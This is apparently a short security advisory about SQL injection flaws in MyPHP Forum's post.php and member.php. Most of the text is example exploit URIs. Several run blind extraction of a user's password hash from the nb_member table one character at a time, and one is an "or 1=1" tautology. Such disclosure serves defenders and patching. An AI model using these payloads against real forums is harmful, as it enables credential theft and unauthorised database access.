|
MyPHP Forum 'post.php' and 'member.php' Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser. The following example URIs are available: http://www.example.com/member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* http://www.example.com/member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98-- http://www.example.com/member.php?action=reqpwd http://www.example.com/post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23 http://www.example.com/post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1 |
|
|
Privacy Statement |
